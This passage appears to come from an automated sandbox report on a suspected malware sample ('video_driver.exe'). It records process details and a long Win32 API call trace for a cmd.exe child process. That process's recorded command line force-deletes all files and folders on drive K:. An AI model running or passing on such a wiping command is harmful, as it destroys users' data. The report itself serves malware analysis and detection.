SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 41 os_tid = 0xa7c Thread: id = 42 os_tid = 0x5bc Thread: id = 43 os_tid = 0x768 Thread: id = 44 os_tid = 0x764 Thread: id = 45 os_tid = 0x758 Thread: id = 46 os_tid = 0x724 Thread: id = 47 os_tid = 0x718 Thread: id = 48 os_tid = 0x714 Thread: id = 49 os_tid = 0x630 Thread: id = 50 os_tid = 0x154 Thread: id = 51 os_tid = 0x150 Thread: id = 52 os_tid = 0x120 Thread: id = 53 os_tid = 0x118 Thread: id = 54 os_tid = 0xf0 Process: id = "31" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x429fa000" os_pid = "0x9c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"K:\" del /f /s /q \"K:\" & FOR /D %p IN (\"K:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 56 os_tid = 0x9cc [0063.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fa54 | out: lpSystemTimeAsFileTime=0x28fa54*(dwLowDateTime=0x38d2d00, dwHighDateTime=0x1d62400)) [0063.311] GetCurrentProcessId () returned 0x9c8 [0063.311] GetCurrentThreadId () returned 0x9cc [0063.311] GetTickCount () returned 0x1147475 [0063.311] QueryPerformanceCounter (in: lpPerformanceCount=0x28fa4c | out: lpPerformanceCount=0x28fa4c*=18344420882) returned 1 [0063.313] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0063.313] __set_app_type (_Type=0x1) [0063.313] __p__fmode () returned 0x770331f4 [0063.313] __p__commode () returned 0x770331fc [0063.313] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0063.314] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0063.314] GetCurrentThreadId () returned 0x9cc [0063.363] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9cc) returned 0x60 [0063.363] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0063.363] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0063.363] SetThreadUILanguage (LangId=0x0) returned 0x409 [0063.367] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0063.367] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f9e4 | out: phkResult=0x28f9e4*=0x0) returned 0x2 [0063.368] VirtualQuery (in: lpAddress=0x28fa1b, lpBuffer=0x28f9b4, dwLength=0x1c | out: lpBuffer=0x28f9b4*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0063.368] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f9b4, dwLength=0x1c | out: lpBuffer=0x28f9b4*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0063.368] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f9b4, dwLength=0x1c | out: lpBuffer=0x28f9b4*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0063.368] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f9b4, dwLength=0x1c | out: lpBuffer=0x28f9b4*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0063.368] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f9b4, dwLength=0x1c | out: lpBuffer=0x28f9b4*(BaseAddress=0x290000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0063.368] GetConsoleOutputCP () returned 0x1b5 [0063.369] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0063.370] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0063.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.370] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0063.371] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.371] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0063.372] _get_osfhandle (_FileHandle=1) returned 0x7 [0063.372] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0063.373] _get_osfhandle (_FileHandle=0) returned 0x3 [0063.373] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0063.375] GetEnvironmentStringsW () returned 0x4420f8* [0063.376] GetProcessHeap () returned 0x430000 [0063.376] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xaca) returned 0x442bd0 [0063.376] FreeEnvironmentStringsW (penv=0x4420f8) returned 1 [0063.376] GetProcessHeap () returned 0x430000 [0063.376] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x4) returned 0x441898 [0063.376] GetEnvironmentStringsW () returned 0x4420f8* [0063.376] GetProcessHeap () returned 0x430000 [0063.376] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xaca) returned 0x4436a8 [0063.377] FreeEnvironmentStringsW (penv=0x4420f8) returned 1 [0063.377] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e954 | out: phkResult=0x28e954*=0x68) returned 0x0 [0063.377] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e95c, lpData=0x28e960, lpcbData=0x28e958*=0x1000 | out: lpType=0x28e95c*=0x0, lpData=0x28e960*=0x0, lpcbData=0x28e958*=0x1000) returned 0x2 [0063.377] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e95c, lpData=0x28e960, lpcbData=0x28e958*=0x1000 | out: lpType=0x28e95c*=0x4, lpData=0x28e960*=0x1, lpcbData=0x28e958*=0x4) returned 0x0 [0063.377] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e95c, lpData=0x28e960, lpcbData=0x28e958*=0x1000 | out: lpType=0x28e95c*=0x0, lpData=0x28e960*=0x1, lpcbData=0x28e958*=0x1000) returned 0x2 [0063.377] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e95c, lpData=0x28e960, lpcbData=0x28e958*=0x1000 | out: lpType=0x28e95c*=0x4, lpData=0x28e960*=0x0, lpcbData=0x28e958*=0x4) returned 0x0 [0063.377] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e95c, lpData=0x28e960, lpcbData=0x28e958*=0x1000 | out: lpType=0x28e95c*=0x4, lpData=0x28e960*=0x40, lpcbData=0x28e958*=0x4) returned 0x0 [0063.377] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e95c, lpData=0x28e960, lpcbData=0x28e958*=0x1000 | out: lpType=0x28e95c*=0x4, lpData=0x28e960*=0x40, lpcbData=0x28e958*=0x4) returned 0x0 [0063.377] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e95c, lpData=0x28e960, lpcbData=0x28e958*=0x1000 | out: lpType=0x28e95c*=0x0, lpData=0x28e960*=0x40, lpcbData=0x28e958*=0x1000) returned 0x2 [0063.378] RegCloseKey (hKey=0x68) returned 0x0 [0063.378] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e954 | out: phkResult=0x28e954*=0x68) returned 0x0 [0063.378] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e95c, lpData=0x28e960, lpcbData=0x28e958*=0x1000 | out: lpType=0x28e95c*=0x0, lpData=0x28e960*=0x40, lpcbData=0x28e958*=0x1000) returned 0x2 [0063.379] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e95c, lpData=0x28e960, lpcbData=0x28e958*=0x1000 | out: lpType=0x28e95c*=0x4, lpData=0x28e960*=0x1, lpcbData=0x28e958*=0x4) returned 0x0 [0063.379] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e95c, lpData=0x28e960, lpcbData=0x28e958*=0x1000 | out: lpType=0x28e95c*=0x0, lpData=0x28e960*=0x1, lpcbData=0x28e958*=0x1000) returned 0x2 [0063.379] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e95c, lpData=0x28e960, lpcbData=0x28e958*=0x1000 | out: lpType=0x28e95c*=0x4, lpData=0x28e960*=0x0, lpcbData=0x28e958*=0x4) returned 0x0 [0063.379] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e95c, lpData=0x28e960, lpcbData=0x28e958*=0x1000 | out: lpType=0x28e95c*=0x4, lpData=0x28e960*=0x9, lpcbData=0x28e958*=0x4) returned 0x0 [0063.379] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e95c, lpData=0x28e960, lpcbData=0x28e958*=0x1000 | out: lpType=0x28e95c*=0x4, lpData=0x28e960*=0x9, lpcbData=0x28e958*=0x4) returned 0x0 [0063.379] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e95c, lpData=0x28e960, lpcbData=0x28e958*=0x1000 | out: lpType=0x28e95c*=0x0, lpData=0x28e960*=0x9, lpcbData=0x28e958*=0x1000) returned 0x2 [0063.379] RegCloseKey (hKey=0x68) returned 0x0 [0063.379] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b69 [0063.379] srand (_Seed=0x5eb34b69) [0063.379] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"K:\" del /f /s /q \"K:\" & FOR /D %p IN (\"K:\") DO rmdir \"%p\" /s /q" [0063.379] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"K:\" del /f /s /q \"K:\" & FOR /D %p IN (\"K:\") DO rmdir \"%p\" /s /q" [0063.380] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0063.380] GetProcessHeap () returned 0x430000 [0063.380] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x210) returned 0x4420f8 [0063.380] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x442100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0063.381] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0063.381] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0063.381] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0063.381] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0063.381] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0063.381] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0063.381] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0063.381] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0063.381] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0063.381] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0063.381] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0063.381] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0063.381] GetProcessHeap () returned 0x430000 [0063.381] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x442bd0 | out: hHeap=0x430000) returned 1 [0063.381] GetEnvironmentStringsW () returned 0x442310* [0063.381] GetProcessHeap () returned 0x430000 [0063.381] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xae2) returned 0x444c70 [0063.382] FreeEnvironmentStringsW (penv=0x442310) returned 1 [0063.382] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0063.382] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0063.382] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0063.382] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0063.382] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0063.382] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0063.382] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0063.382] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0063.382] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0063.382] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0063.382] GetProcessHeap () returned 0x430000 [0063.382] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x54) returned 0x4417c8 [0063.382] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f720 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0063.383] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x28f720, lpFilePart=0x28f71c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x28f71c*="Desktop") returned 0x25 [0063.383] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0063.383] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f49c | out: lpFindFileData=0x28f49c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x445760 [0063.383] FindClose (in: hFindFile=0x445760 | out: hFindFile=0x445760) returned 1 [0063.383] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x28f49c | out: lpFindFileData=0x28f49c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x445760 [0063.383] FindClose (in: hFindFile=0x445760 | out: hFindFile=0x445760) returned 1 [0063.384] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0063.384] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x28f49c | out: lpFindFileData=0x28f49c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x445760 [0063.384] FindClose (in: hFindFile=0x445760 | out: hFindFile=0x445760) returned 1 [0063.384] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0063.384] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0063.384] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0063.384] GetProcessHeap () returned 0x430000 [0063.385] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x444c70 | out: hHeap=0x430000) returned 1 [0063.385] GetEnvironmentStringsW () returned 0x444180* [0063.385] GetProcessHeap () returned 0x430000 [0063.385] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xb36) returned 0x445fa0 [0063.385] FreeEnvironmentStringsW (penv=0x444180) returned 1 [0063.385] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0063.385] GetProcessHeap () returned 0x430000 [0063.385] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4417c8 | out: hHeap=0x430000) returned 1 [0063.385] GetProcessHeap () returned 0x430000 [0063.385] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x400e) returned 0x446ae0 [0063.386] GetProcessHeap () returned 0x430000 [0063.386] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xa0) returned 0x442e50 [0063.386] GetProcessHeap () returned 0x430000 [0063.386] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x446ae0 | out: hHeap=0x430000) returned 1 [0063.386] GetConsoleOutputCP () returned 0x1b5 [0063.389] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0063.389] GetUserDefaultLCID () returned 0x409 [0063.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0063.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f860, cchData=128 | out: lpLCData="0") returned 2 [0063.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f860, cchData=128 | out: lpLCData="0") returned 2 [0063.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f860, cchData=128 | out: lpLCData="1") returned 2 [0063.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0063.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0063.392] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0063.392] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0063.392] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0063.392] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0063.392] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0063.392] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0063.392] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0063.392] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0063.392] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0063.394] GetProcessHeap () returned 0x430000 [0063.395] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x20c) returned 0x442ef8 [0063.395] GetConsoleTitleW (in: lpConsoleTitle=0x442ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0063.395] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0063.395] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0063.396] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0063.396] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0063.397] GetProcessHeap () returned 0x430000 [0063.397] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x400a) returned 0x446ae0 [0063.397] GetProcessHeap () returned 0x430000 [0063.397] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x4008) returned 0x44aaf8 [0063.398] GetProcessHeap () returned 0x430000 [0063.398] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1a) returned 0x4457e0 [0063.398] GetEnvironmentVariableW (in: lpName="p IN (\"K", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0063.398] _wcsicmp (_String1="p IN (\"K", _String2="CD") returned 13 [0063.398] _wcsicmp (_String1="p IN (\"K", _String2="ERRORLEVEL") returned 11 [0063.398] _wcsicmp (_String1="p IN (\"K", _String2="CMDEXTVERSION") returned 13 [0063.398] _wcsicmp (_String1="p IN (\"K", _String2="CMDCMDLINE") returned 13 [0063.398] _wcsicmp (_String1="p IN (\"K", _String2="DATE") returned 12 [0063.398] _wcsicmp (_String1="p IN (\"K", _String2="TIME") returned -4 [0063.398] _wcsicmp (_String1="p IN (\"K", _String2="RANDOM") returned -2 [0063.398] _wcsicmp (_String1="p IN (\"K", _String2="HIGHESTNUMANODENUMBER") returned 8 [0063.398] GetProcessHeap () returned 0x430000 [0063.398] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4457e0 | out: hHeap=0x430000) returned 1 [0063.398] GetProcessHeap () returned 0x430000 [0063.398] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44aaf8 | out: hHeap=0x430000) returned 1 [0063.399] GetProcessHeap () returned 0x430000 [0063.399] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x4008) returned 0x44aaf8 [0063.399] GetProcessHeap () returned 0x430000 [0063.399] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44aaf8 | out: hHeap=0x430000) returned 1 [0063.399] GetProcessHeap () returned 0x430000 [0063.399] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x446ae0 | out: hHeap=0x430000) returned 1 [0063.399] _wcsicmp (_String1="if", _String2=")") returned 64 [0063.399] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0063.400] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0063.400] _wcsicmp (_String1="IF", _String2="if") returned 0 [0063.400] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0063.400] GetProcessHeap () returned 0x430000 [0063.400] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x443110 [0063.400] GetProcessHeap () returned 0x430000 [0063.400] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xe) returned 0x43ffc0 [0063.401] GetProcessHeap () returned 0x430000 [0063.401] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x20) returned 0x4457e0 [0063.402] GetProcessHeap () returned 0x430000 [0063.402] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x4457e0, Size=0x16) returned 0x441800 [0063.402] GetProcessHeap () returned 0x430000 [0063.402] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x441800) returned 0x16 [0063.402] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0063.403] GetProcessHeap () returned 0x430000 [0063.403] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x443170 [0063.403] GetProcessHeap () returned 0x430000 [0063.403] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x14) returned 0x4431d0 [0063.403] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0063.403] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0063.404] GetProcessHeap () returned 0x430000 [0063.404] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x12) returned 0x4431f0 [0063.404] GetProcessHeap () returned 0x430000 [0063.404] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1c) returned 0x4457e0 [0063.404] GetProcessHeap () returned 0x430000 [0063.404] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x4457e0, Size=0x14) returned 0x443210 [0063.404] GetProcessHeap () returned 0x430000 [0063.404] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x443210) returned 0x14 [0063.405] _wcsicmp (_String1="del", _String2=")") returned 59 [0063.405] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0063.405] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0063.405] _wcsicmp (_String1="IF", _String2="del") returned 5 [0063.405] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0063.406] _wcsicmp (_String1="REM", _String2="del") returned 14 [0063.406] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0063.406] GetProcessHeap () returned 0x430000 [0063.406] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x443230 [0063.406] GetProcessHeap () returned 0x430000 [0063.406] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x10) returned 0x43ffd8 [0063.407] GetProcessHeap () returned 0x430000 [0063.407] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x28) returned 0x443290 [0063.498] GetProcessHeap () returned 0x430000 [0063.498] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x4432c0 [0063.499] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0063.499] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0063.499] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0063.499] GetProcessHeap () returned 0x430000 [0063.499] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x443320 [0063.499] GetProcessHeap () returned 0x430000 [0063.499] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x44) returned 0x443380 [0063.500] GetProcessHeap () returned 0x430000 [0063.500] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x14) returned 0x4433d0 [0063.500] GetProcessHeap () returned 0x430000 [0063.500] 